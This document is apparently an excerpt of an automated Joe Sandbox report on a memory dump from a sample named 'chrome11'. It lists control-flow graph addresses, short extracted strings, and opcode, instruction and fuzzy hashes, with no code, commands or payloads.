                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H$r6H$r6H$r6H$r6H$r6H$r6H
                                                • API String ID: 0-2638412420
                                                • Opcode ID: 093d56ea2537db57e9fc5666be81ac43b6427bb5e3ffff3f7e8d547c967c4cb4
                                                • Instruction ID: b52c50b495e191007ed82a69e798b68ee23cb0222e0599c7e505f4baa4d77478
                                                • Opcode Fuzzy Hash: 093d56ea2537db57e9fc5666be81ac43b6427bb5e3ffff3f7e8d547c967c4cb4
                                                • Instruction Fuzzy Hash: B1221770A086498FDF98DF58C895AADB7F2FF58304F1446A9D41EE7296CB34E842CB41

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 208 7ff887e0326d-7ff887e032ad 210 7ff887e032b4-7ff887e0335f 208->210 211 7ff887e032af 208->211 219 7ff887e03366-7ff887e033b5 210->219 220 7ff887e03361 210->220 211->210 223 7ff887e033b7 219->223 224 7ff887e033bc-7ff887e0340a 219->224 220->219 223->224 226 7ff887e03411-7ff887e03432 224->226 227 7ff887e0340c 224->227 229 7ff887e03434-7ff887e03448 226->229 230 7ff887e03449-7ff887e03465 226->230 227->226 229->230 233 7ff887e03467-7ff887e03492 230->233 234 7ff887e03494-7ff887e034b0 230->234 237 7ff887e034d6-7ff887e0351b 233->237 234->237 238 7ff887e034b2-7ff887e034d5 234->238 242 7ff887e03522-7ff887e03575 237->242 243 7ff887e0351d 237->243 238->237 247 7ff887e03577 242->247 248 7ff887e0357c-7ff887e035c5 242->248 243->242 247->248 250 7ff887e035c7 248->250 251 7ff887e035cc-7ff887e03615 248->251 250->251 253 7ff887e03617 251->253 254 7ff887e0361c-7ff887e0366d 251->254 253->254 256 7ff887e03674-7ff887e0369f 254->256 257 7ff887e0366f 254->257 259 7ff887e036a1-7ff887e036b9 256->259 260 7ff887e036bb-7ff887e036e6 256->260 257->256 263 7ff887e036e7-7ff887e03751 259->263 260->263 266 7ff887e03753 263->266 267 7ff887e03758-7ff887e03778 263->267 266->267 269 7ff887e037ca-7ff887e03824 267->269 270 7ff887e0377a-7ff887e037bf 267->270 278 7ff887e0382b-7ff887e03937 call 7ff887e03939 269->278 270->269
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p[J$p[J$+_H
                                                • API String ID: 0-365840550
                                                • Opcode ID: bcc96a2a2f35063378c4723c0d47d8ec1c30a74ff154e7b7372387eafbcc616f
                                                • Instruction ID: af46808ff73f899ab87ff7a8a4748b48805c6ea2176065bd53b9f44c94845df1
                                                • Opcode Fuzzy Hash: bcc96a2a2f35063378c4723c0d47d8ec1c30a74ff154e7b7372387eafbcc616f
                                                • Instruction Fuzzy Hash: 4C329A31C4868E8FDB45EF68C8956EDBBB1FF59340F0401BAE409D7292DB38A945CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 290 7ff887e0036d-7ff887e00378 291 7ff887e0037a-7ff887e003cb 290->291 292 7ff887e003d9-7ff887e00403 290->292 291->292 295 7ff887e00405 292->295 296 7ff887e0040a-7ff887e00499 292->296 295->296 306 7ff887e004a0-7ff887e00529 296->306 307 7ff887e0049b 296->307 310 7ff887e00530-7ff887e005ff call 7ff887e00480 306->310 311 7ff887e0052b 306->311 307->306 316 7ff887e00606-7ff887e00681 310->316 317 7ff887e00601 310->317 311->310 322 7ff887e00683 316->322 323 7ff887e00688-7ff887e006fa 316->323 317->316 322->323 326 7ff887e00701-7ff887e00747 323->326 327 7ff887e006fc 323->327 330 7ff887e00749-7ff887e0074c 326->330 327->326 331 7ff887e00755-7ff887e00795 330->331 334 7ff887e00797 331->334 335 7ff887e0079c-7ff887e007f2 331->335 334->335 337 7ff887e007f4 335->337 338 7ff887e007f9-7ff887e00830 335->338 337->338 340 7ff887e00836-7ff887e008d1 338->340 341 7ff887e008d3-7ff887e008fb 338->341 344 7ff887e00904-7ff887e00954 340->344 341->344 350 7ff887e00956-7ff887e00969 344->350 351 7ff887e0099a-7ff887e0099e 344->351 352 7ff887e0099f-7ff887e00a0f 350->352 354 7ff887e0096b-7ff887e00999 350->354 351->352 359 7ff887e00a16-7ff887e00a96 call 7ff887e00510 352->359 360 7ff887e00a11 352->360 365 7ff887e00a9d-7ff887e00abb 359->365 366 7ff887e00a98 359->366 360->359 369 7ff887e00abc-7ff887e00add 365->369 366->365 372 7ff887e00adf-7ff887e00b29 369->372 377 7ff887e00b2e-7ff887e00b5d 372->377 378 7ff887e00b2b-7ff887e00b2c 372->378 380 7ff887e00b64-7ff887e00bc9 377->380 381 7ff887e00b5f 377->381 378->377 386 7ff887e00bd0-7ff887e00c2a 380->386 387 7ff887e00bcb 380->387 381->380 390 7ff887e00c31-7ff887e00d6a call 7ff887dfd5d0 386->390 391 7ff887e00c2c 386->391 387->386 408 7ff887e00d71-7ff887e00e2f 390->408 409 7ff887e00d6c 390->409 391->390 419 7ff887e00e64-7ff887e00eb0 408->419 420 7ff887e00e31-7ff887e00e5d 408->420 409->408 420->419
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "9H$r6H$r6H
                                                • API String ID: 0-933648691
                                                • Opcode ID: 64a176ba6e2dfb7f2c32cf85722b9599f452b1424478daa0aa5409fd26c50cf3
                                                • Instruction ID: a408ac869b33495ef07f92865956420c0d2c24c570438dcbc68aa1eeb3c88f50
                                                • Opcode Fuzzy Hash: 64a176ba6e2dfb7f2c32cf85722b9599f452b1424478daa0aa5409fd26c50cf3
                                                • Instruction Fuzzy Hash: 14227170948A8D8FDB85DF18C895AAE7BF1FF58740F0401AAE419C7296CB39E855CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 425 7ff887dfbd15-7ff887dfbd45 427 7ff887dfbd47 425->427 428 7ff887dfbd4c-7ff887dfbda7 425->428 427->428 430 7ff887dfbdae-7ff887dfbdce 428->430 431 7ff887dfbda9 428->431 433 7ff887dfbe43-7ff887dfbe59 430->433 434 7ff887dfbdd0-7ff887dfbe1d call 7ff887df7020 call 7ff887df3a18 430->434 431->430 437 7ff887dfbec3-7ff887dfbed3 433->437 438 7ff887dfbe5b-7ff887dfbeb2 call 7ff887df7020 433->438 451 7ff887dfbe25-7ff887dfbe42 434->451 445 7ff887dfbed5-7ff887dfbf55 437->445 446 7ff887dfbeb9-7ff887dfbec2 437->446 438->446 458 7ff887dfbf57 445->458 459 7ff887dfbf5c-7ff887dfbfb5 445->459 458->459 461 7ff887dfbfb7 459->461 462 7ff887dfbfbc-7ff887dfbfe2 459->462 461->462 465 7ff887dfc02b-7ff887dfc035 462->465 466 7ff887dfc037-7ff887dfc048 465->466 467 7ff887dfbfe4-7ff887dfbfef 465->467 470 7ff887dfc101-7ff887dfc12d 466->470 471 7ff887dfc04e-7ff887dfc060 466->471 468 7ff887dfbff6-7ff887dfc012 467->468 469 7ff887dfbff1 467->469 472 7ff887dfc014 468->472 473 7ff887dfc019-7ff887dfc028 468->473 469->468 474 7ff887dfc134-7ff887dfc151 470->474 475 7ff887dfc12f 470->475 476 7ff887dfc067-7ff887dfc06e 471->476 477 7ff887dfc062 471->477 472->473 473->465 478 7ff887dfc153 474->478 479 7ff887dfc158-7ff887dfc17c 474->479 475->474 480 7ff887dfc071-7ff887dfc097 476->480 477->476 478->479 481 7ff887dfc183-7ff887dfc199 479->481 482 7ff887dfc17e 479->482 483 7ff887dfc09e-7ff887dfc0b2 480->483 484 7ff887dfc099 480->484 485 7ff887dfc207-7ff887dfc20b 481->485 482->481 486 7ff887dfc0b4 483->486 487 7ff887dfc0b9-7ff887dfc0e3 483->487 484->483 490 7ff887dfc20d-7ff887dfc233 485->490 491 7ff887dfc19b-7ff887dfc1b6 485->491 486->487 488 7ff887dfc0e5 487->488 489 7ff887dfc0ea-7ff887dfc0fb 487->489 488->489 489->470 489->480 500 7ff887dfc29a-7ff887dfc2a4 490->500 492 7ff887dfc1bd-7ff887dfc1cb 491->492 493 7ff887dfc1b8 491->493 495 7ff887dfc1d2-7ff887dfc1ee 492->495 496 7ff887dfc1cd 492->496 493->492 498 7ff887dfc1f5-7ff887dfc204 495->498 499 7ff887dfc1f0 495->499 496->495 498->485 499->498 501 7ff887dfc2a6-7ff887dfc2b1 500->501 502 7ff887dfc235-7ff887dfc242 500->502 503 7ff887dfc244 502->503 504 7ff887dfc249-7ff887dfc260 502->504 503->504 505 7ff887dfc267-7ff887dfc281 504->505 506 7ff887dfc262 504->506 507 7ff887dfc283 505->507 508 7ff887dfc288-7ff887dfc297 505->508 506->505 507->508 508->500
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0WR$b4H$b4H
                                                • API String ID: 0-4283693081
                                                • Opcode ID: 17561780213e28a9ff63420a9143184d98bbc4025a30b990e67771905c36c367
                                                • Instruction ID: 3c6029ec6edfc36f7fdc7935a3bd7acaad4cbc878be7e0e9dafc1fc06f8e2676
                                                • Opcode Fuzzy Hash: 17561780213e28a9ff63420a9143184d98bbc4025a30b990e67771905c36c367
                                                • Instruction Fuzzy Hash: 4822A570D0864E8FDB45DFA8C895AEDBBB1FF58340F1442B9D40AD7296CB38A842CB51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 559 7ff887df2e71-7ff887df2e75 560 7ff887df2e77-7ff887df2e78 559->560 561 7ff887df2e7a-7ff887df2ebe 559->561 560->561 563 7ff887df2ec5-7ff887df2f20 561->563 564 7ff887df2ec0 561->564 568 7ff887df2f22-7ff887df2fab 563->568 564->563
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H$r6H$r6H
                                                • API String ID: 0-2701640910
                                                • Opcode ID: 63280b698dd05c8daa964b9e79f6adf6c8b3bce8711b80af056bc26d9186a661
                                                • Instruction ID: 2f532e1e6abdfd962e8543a274deb70038ceca34c5922bed3027e3ba873156ab
                                                • Opcode Fuzzy Hash: 63280b698dd05c8daa964b9e79f6adf6c8b3bce8711b80af056bc26d9186a661
                                                • Instruction Fuzzy Hash: 7C415071E18A4E8FDF84DF58D855AEEB7F1FFA8300F104666D409D725ACA34A852CB80

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 574 7ff887e00480-7ff887e00499 575 7ff887e004a0-7ff887e00529 574->575 576 7ff887e0049b 574->576 579 7ff887e00530-7ff887e005ff call 7ff887e00480 575->579 580 7ff887e0052b 575->580 576->575 585 7ff887e00606-7ff887e00681 579->585 586 7ff887e00601 579->586 580->579 591 7ff887e00683 585->591 592 7ff887e00688-7ff887e006fa 585->592 586->585 591->592 595 7ff887e00701-7ff887e00795 592->595 596 7ff887e006fc 592->596 603 7ff887e00797 595->603 604 7ff887e0079c-7ff887e007f2 595->604 596->595 603->604 606 7ff887e007f4 604->606 607 7ff887e007f9-7ff887e00830 604->607 606->607 609 7ff887e00836-7ff887e008d1 607->609 610 7ff887e008d3-7ff887e008fb 607->610 613 7ff887e00904-7ff887e00954 609->613 610->613 619 7ff887e00956-7ff887e00969 613->619 620 7ff887e0099a-7ff887e0099e 613->620 621 7ff887e0099f-7ff887e00a0f 619->621 623 7ff887e0096b-7ff887e00999 619->623 620->621 628 7ff887e00a16-7ff887e00a96 call 7ff887e00510 621->628 629 7ff887e00a11 621->629 634 7ff887e00a9d-7ff887e00abb 628->634 635 7ff887e00a98 628->635 629->628 638 7ff887e00abc-7ff887e00add 634->638 635->634 641 7ff887e00adf-7ff887e00b29 638->641 646 7ff887e00b2e-7ff887e00b5d 641->646 647 7ff887e00b2b-7ff887e00b2c 641->647 649 7ff887e00b64-7ff887e00bc9 646->649 650 7ff887e00b5f 646->650 647->646 655 7ff887e00bd0-7ff887e00c2a 649->655 656 7ff887e00bcb 649->656 650->649 659 7ff887e00c31-7ff887e00d6a call 7ff887dfd5d0 655->659 660 7ff887e00c2c 655->660 656->655 677 7ff887e00d71-7ff887e00e2f 659->677 678 7ff887e00d6c 659->678 660->659 688 7ff887e00e64-7ff887e00eb0 677->688 689 7ff887e00e31-7ff887e00e5d 677->689 678->677 689->688
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H$r6H
                                                • API String ID: 0-661526703
                                                • Opcode ID: c00948cc749d8d8afaff430239f5a7837eec9d4dd430a997324470c0bc3ec268
                                                • Instruction ID: 499fea76644b6dc448e3b09962afbe8f9069da9b8290b7906237f23423fbe484
                                                • Opcode Fuzzy Hash: c00948cc749d8d8afaff430239f5a7837eec9d4dd430a997324470c0bc3ec268
                                                • Instruction Fuzzy Hash: 4A82A570948A8D8FDB85EF68C855AED7BF1FF59340F0401AAE419D7292CB38E855CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 694 7ff887e00510-7ff887e00529 695 7ff887e00530-7ff887e005ff call 7ff887e00480 694->695 696 7ff887e0052b 694->696 701 7ff887e00606-7ff887e00681 695->701 702 7ff887e00601 695->702 696->695 707 7ff887e00683 701->707 708 7ff887e00688-7ff887e006fa 701->708 702->701 707->708 711 7ff887e00701-7ff887e0074c 708->711 712 7ff887e006fc 708->712 716 7ff887e00755-7ff887e00795 711->716 712->711 719 7ff887e00797 716->719 720 7ff887e0079c-7ff887e007f2 716->720 719->720 722 7ff887e007f4 720->722 723 7ff887e007f9-7ff887e00830 720->723 722->723 725 7ff887e00836-7ff887e008d1 723->725 726 7ff887e008d3-7ff887e008fb 723->726 729 7ff887e00904-7ff887e00954 725->729 726->729 735 7ff887e00956-7ff887e00969 729->735 736 7ff887e0099a-7ff887e0099e 729->736 737 7ff887e0099f-7ff887e00a0f 735->737 739 7ff887e0096b-7ff887e00999 735->739 736->737 744 7ff887e00a16-7ff887e00a96 call 7ff887e00510 737->744 745 7ff887e00a11 737->745 750 7ff887e00a9d-7ff887e00abb 744->750 751 7ff887e00a98 744->751 745->744 754 7ff887e00abc-7ff887e00add 750->754 751->750 757 7ff887e00adf-7ff887e00b29 754->757 762 7ff887e00b2e-7ff887e00b5d 757->762 763 7ff887e00b2b-7ff887e00b2c 757->763 765 7ff887e00b64-7ff887e00bc9 762->765 766 7ff887e00b5f 762->766 763->762 771 7ff887e00bd0-7ff887e00c2a 765->771 772 7ff887e00bcb 765->772 766->765 775 7ff887e00c31-7ff887e00d6a call 7ff887dfd5d0 771->775 776 7ff887e00c2c 771->776 772->771 793 7ff887e00d71-7ff887e00e2f 775->793 794 7ff887e00d6c 775->794 776->775 804 7ff887e00e64-7ff887e00eb0 793->804 805 7ff887e00e31-7ff887e00e5d 793->805 794->793 805->804
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H$r6H
                                                • API String ID: 0-661526703
                                                • Opcode ID: 8e3bf551c41beb07f701082b094a19a907be209a2a22409847d7972011369a14
                                                • Instruction ID: 1bb46356c3acbc2a9c74b7c22e16ebed5e7b4c7eee91ccc25ced3034b4d4f37a
                                                • Opcode Fuzzy Hash: 8e3bf551c41beb07f701082b094a19a907be209a2a22409847d7972011369a14
                                                • Instruction Fuzzy Hash: 9372B570948A8E8FDB85EF68C855AED7BF1FF59340F0401AAD419D7292CB38E855CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 810 7ff887dfdb2e-7ff887dfdb5e 812 7ff887dfdb76-7ff887dfdb99 810->812 813 7ff887dfdb60-7ff887dfdb71 810->813 815 7ff887dfdb9c-7ff887dfdbcf 812->815 816 7ff887dfdb9b 812->816 813->812 818 7ff887dfdbd6-7ff887dfdbdf 815->818 819 7ff887dfdbd1 815->819 816->815 820 7ff887dfdc17-7ff887dfdc6d 818->820 821 7ff887dfdbe1-7ff887dfdbe8 818->821 819->818 827 7ff887dfdc74-7ff887dfdcea 820->827 828 7ff887dfdc6f 820->828 822 7ff887dfdbea-7ff887dfdc08 call 7ff887df85f0 821->822 825 7ff887dfdc0d-7ff887dfdc16 822->825 832 7ff887dfdcf1-7ff887dfdd03 827->832 833 7ff887dfdcec 827->833 828->827 834 7ff887dfdd05-7ff887dfdd18 832->834 835 7ff887dfdd19-7ff887dfddd1 832->835 833->832 842 7ff887dfddd4-7ff887dfddfb 835->842 843 7ff887dfddd3 835->843 845 7ff887dfde02-7ff887dfde0b 842->845 846 7ff887dfddfd 842->846 843->842 847 7ff887dfde33-7ff887dfde79 845->847 848 7ff887dfde0d-7ff887dfde2b 845->848 846->845 851 7ff887dfde80-7ff887dfde85 847->851 852 7ff887dfde7b 847->852 848->847 854 7ff887dfde97-7ff887dfdf06 851->854 855 7ff887dfde87-7ff887dfde96 851->855 852->851 859 7ff887dfdf0d-7ff887dfdf16 854->859 860 7ff887dfdf08 854->860 861 7ff887dfdf1e-7ff887dfdf6b call 7ff887dfb980 call 7ff887dfb6a0 859->861 860->859 867 7ff887dfdf6d-7ff887dfdf82 861->867 868 7ff887dfdfcb-7ff887dfdff7 861->868 870 7ff887dfdf84-7ff887dfdf92 867->870 871 7ff887dfdffe-7ff887dfe062 call 7ff887df3320 868->871 872 7ff887dfdff9 868->872 873 7ff887dfdf9a-7ff887dfdfc9 870->873 878 7ff887dfe064 871->878 879 7ff887dfe069-7ff887dfe108 call 7ff887df5a00 call 7ff887dfbb80 871->879 872->871 873->868 878->879 886 7ff887dfe10f-7ff887dfe169 879->886 887 7ff887dfe10a 879->887 891 7ff887dfe173-7ff887dfe185 886->891 892 7ff887dfe16b-7ff887dfe171 886->892 887->886 893 7ff887dfe188-7ff887dfe1f3 891->893 892->893 900 7ff887dfe1f5-7ff887dfe1fb 893->900 901 7ff887dfe1fd-7ff887dfe20f 893->901 902 7ff887dfe212-7ff887dfe27d 900->902 901->902 908 7ff887dfe287-7ff887dfe299 902->908 909 7ff887dfe27f-7ff887dfe285 902->909 910 7ff887dfe29c-7ff887dfe31c 908->910 909->910 916 7ff887dfe31e-7ff887dfe327 910->916 917 7ff887dfe329-7ff887dfe341 910->917 918 7ff887dfe347-7ff887dfe3ad 916->918 917->918
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: A,_H$r6H
                                                • API String ID: 0-123315464
                                                • Opcode ID: 62a63fac542fd7338888f4727f5f0fd548f1301b212c93a8cc421e3a5c56ad6e
                                                • Instruction ID: 2da5e5d6995638fe500440b40a84ef9be68cd4e0f81eb202eff8d02b9e65d616
                                                • Opcode Fuzzy Hash: 62a63fac542fd7338888f4727f5f0fd548f1301b212c93a8cc421e3a5c56ad6e
                                                • Instruction Fuzzy Hash: 7C627E30D18A8D8FEB85EF68C855AEDBBF1FF59340F0401AAD409D7296DB34A985CB41

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1017 7ff887df7fdd-7ff887df802a 1019 7ff887df8031-7ff887df80ad call 7ff887df3a28 1017->1019 1020 7ff887df802c 1017->1020 1028 7ff887df80b2-7ff887df80d9 1019->1028 1029 7ff887df80af-7ff887df80b0 1019->1029 1020->1019 1031 7ff887df80e0-7ff887df813a 1028->1031 1032 7ff887df80db 1028->1032 1029->1028 1035 7ff887df8141-7ff887df81aa 1031->1035 1036 7ff887df813c 1031->1036 1032->1031 1043 7ff887df81f4-7ff887df8205 1035->1043 1044 7ff887df81ac-7ff887df81ec 1035->1044 1036->1035 1045 7ff887df8207 1043->1045 1046 7ff887df81ef-7ff887df81f2 1043->1046 1044->1046 1047 7ff887df8209-7ff887df821d 1045->1047 1048 7ff887df8258 1045->1048 1046->1043 1050 7ff887df8222-7ff887df8256 1047->1050 1051 7ff887df821f-7ff887df8220 1047->1051 1053 7ff887df825d-7ff887df8262 1048->1053 1050->1048 1050->1053 1051->1050 1055 7ff887df8264-7ff887df8293 1053->1055 1056 7ff887df829b-7ff887df82df 1053->1056 1055->1056 1060 7ff887df82e6-7ff887df836c 1056->1060 1061 7ff887df82e1 1056->1061 1065 7ff887df8373-7ff887df8378 1060->1065 1066 7ff887df836e 1060->1066 1061->1060 1067 7ff887df83bc-7ff887df83ef 1065->1067 1068 7ff887df837a-7ff887df83b4 1065->1068 1066->1065 1072 7ff887df83f5-7ff887df841e 1067->1072 1073 7ff887df84d0-7ff887df84dc 1067->1073 1068->1067 1077 7ff887df8450-7ff887df8470 1072->1077 1076 7ff887df84e2-7ff887df84f9 1073->1076 1078 7ff887df84fc-7ff887df8530 1076->1078 1079 7ff887df84fb 1076->1079 1082 7ff887df8476-7ff887df848c 1077->1082 1080 7ff887df8537-7ff887df855a 1078->1080 1081 7ff887df8532 1078->1081 1079->1078 1083 7ff887df8585-7ff887df85be 1080->1083 1084 7ff887df855c-7ff887df8566 1080->1084 1081->1080 1082->1076 1085 7ff887df848e-7ff887df84ce 1082->1085 1086 7ff887df857c-7ff887df8584 1084->1086 1087 7ff887df8568-7ff887df857b 1084->1087 1085->1076
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H$r6H
                                                • API String ID: 0-661526703
                                                • Opcode ID: f12f906c73d1605a90f72df83de26963ede97f0e5ec264d622629a4681cfc7a0
                                                • Instruction ID: 51fbf3854d726b2a6de99331aabcdb44fbf57f52ea3447b0e00c6900b04c0e66
                                                • Opcode Fuzzy Hash: f12f906c73d1605a90f72df83de26963ede97f0e5ec264d622629a4681cfc7a0
                                                • Instruction Fuzzy Hash: D822B370948A8D8FDB85DF68C885AEDBBF1FF59340F0441AAE409D7296CB34E855CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1090 7ff887e003cd-7ff887e00403 1093 7ff887e00405 1090->1093 1094 7ff887e0040a-7ff887e00499 1090->1094 1093->1094 1100 7ff887e004a0-7ff887e00529 1094->1100 1101 7ff887e0049b 1094->1101 1104 7ff887e00530-7ff887e005ff call 7ff887e00480 1100->1104 1105 7ff887e0052b 1100->1105 1101->1100 1110 7ff887e00606-7ff887e00681 1104->1110 1111 7ff887e00601 1104->1111 1105->1104 1116 7ff887e00683 1110->1116 1117 7ff887e00688-7ff887e006fa 1110->1117 1111->1110 1116->1117 1120 7ff887e00701-7ff887e00747 1117->1120 1121 7ff887e006fc 1117->1121 1124 7ff887e00749-7ff887e0074c 1120->1124 1121->1120 1125 7ff887e00755-7ff887e00795 1124->1125 1128 7ff887e00797 1125->1128 1129 7ff887e0079c-7ff887e007f2 1125->1129 1128->1129 1131 7ff887e007f4 1129->1131 1132 7ff887e007f9-7ff887e00830 1129->1132 1131->1132 1134 7ff887e00836-7ff887e008d1 1132->1134 1135 7ff887e008d3-7ff887e008fb 1132->1135 1138 7ff887e00904-7ff887e00954 1134->1138 1135->1138 1144 7ff887e00956-7ff887e00969 1138->1144 1145 7ff887e0099a-7ff887e0099e 1138->1145 1146 7ff887e0099f-7ff887e00a0f 1144->1146 1148 7ff887e0096b-7ff887e00999 1144->1148 1145->1146 1153 7ff887e00a16-7ff887e00a96 call 7ff887e00510 1146->1153 1154 7ff887e00a11 1146->1154 1159 7ff887e00a9d-7ff887e00abb 1153->1159 1160 7ff887e00a98 1153->1160 1154->1153 1163 7ff887e00abc-7ff887e00add 1159->1163 1160->1159 1166 7ff887e00adf-7ff887e00b29 1163->1166 1171 7ff887e00b2e-7ff887e00b5d 1166->1171 1172 7ff887e00b2b-7ff887e00b2c 1166->1172 1174 7ff887e00b64-7ff887e00bc9 1171->1174 1175 7ff887e00b5f 1171->1175 1172->1171 1180 7ff887e00bd0-7ff887e00c2a 1174->1180 1181 7ff887e00bcb 1174->1181 1175->1174 1184 7ff887e00c31-7ff887e00d6a call 7ff887dfd5d0 1180->1184 1185 7ff887e00c2c 1180->1185 1181->1180 1202 7ff887e00d71-7ff887e00e2f 1184->1202 1203 7ff887e00d6c 1184->1203 1185->1184 1213 7ff887e00e64-7ff887e00eb0 1202->1213 1214 7ff887e00e31-7ff887e00e5d 1202->1214 1203->1202 1214->1213
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6H$r6H
                                                • API String ID: 0-661526703
                                                • Opcode ID: c3eeeb32457d8c3457610dd9674da8b00beecbd76744c528d0ef2e1f7aad9e79
                                                • Instruction ID: f7f94ece7c536473d34d2fc4706ab58f3b8647a33b9d1fc451e5a68a658f9b85
                                                • Opcode Fuzzy Hash: c3eeeb32457d8c3457610dd9674da8b00beecbd76744c528d0ef2e1f7aad9e79
                                                • Instruction Fuzzy Hash: 2622817094C68D8FDB89DF28C895AAD7BF1FF59340F0401AAE459C7292CB39E855CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1219 7ff887e0667b-7ff887e06693 1221 7ff887e0669b-7ff887e067db 1219->1221 1233 7ff887e067dd-7ff887e06815 1221->1233 1234 7ff887e06818-7ff887e06869 1221->1234 1233->1234 1239 7ff887e0686c-7ff887e06895 1234->1239 1240 7ff887e0686b 1234->1240 1242 7ff887e06897 1239->1242 1243 7ff887e0689c-7ff887e068d5 1239->1243 1240->1239 1242->1243 1245 7ff887e068d7 1243->1245 1246 7ff887e068dc-7ff887e06919 1243->1246 1245->1246 1248 7ff887e06920-7ff887e06965 1246->1248 1249 7ff887e0691b 1246->1249 1252 7ff887e06967 1248->1252 1253 7ff887e0696c-7ff887e069cf 1248->1253 1249->1248 1252->1253 1255 7ff887e069d6-7ff887e06a00 1253->1255 1256 7ff887e069d1 1253->1256 1258 7ff887e06a02-7ff887e06a28 1255->1258 1259 7ff887e06a2d-7ff887e06a47 1255->1259 1256->1255 1262 7ff887e06cae-7ff887e06cb7 1258->1262 1263 7ff887e06a81-7ff887e06a9a 1259->1263 1264 7ff887e06a49-7ff887e06a7c 1259->1264 1267 7ff887e06aa7-7ff887e06ada 1263->1267 1268 7ff887e06a9c-7ff887e06aa5 1263->1268 1264->1262 1273 7ff887e06ae7-7ff887e06af4 1267->1273 1274 7ff887e06adc-7ff887e06ae5 1267->1274 1269 7ff887e06afa-7ff887e06b17 1268->1269 1271 7ff887e06b24-7ff887e06b71 1269->1271 1272 7ff887e06b19-7ff887e06b1f 1269->1272 1278 7ff887e06b77-7ff887e06be2 1271->1278 1279 7ff887e06c7f-7ff887e06cac 1271->1279 1272->1262 1273->1269 1274->1269 1284 7ff887e06be4 1278->1284 1285 7ff887e06be9-7ff887e06c24 1278->1285 1279->1262 1284->1285 1287 7ff887e06c26 1285->1287 1288 7ff887e06c2b-7ff887e06c7d 1285->1288 1287->1288 1288->1262
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p[J$/H
                                                • API String ID: 0-798110143
                                                • Opcode ID: 24b1166181f3e791d39aa89e70fc64e20ca16ff8981f39dd2e3cd12c87b31fc0
                                                • Instruction ID: df7808b371ffdaf1bbf8384d94bf791cef67b2dac866a36a9e9edd47d19d8017
                                                • Opcode Fuzzy Hash: 24b1166181f3e791d39aa89e70fc64e20ca16ff8981f39dd2e3cd12c87b31fc0
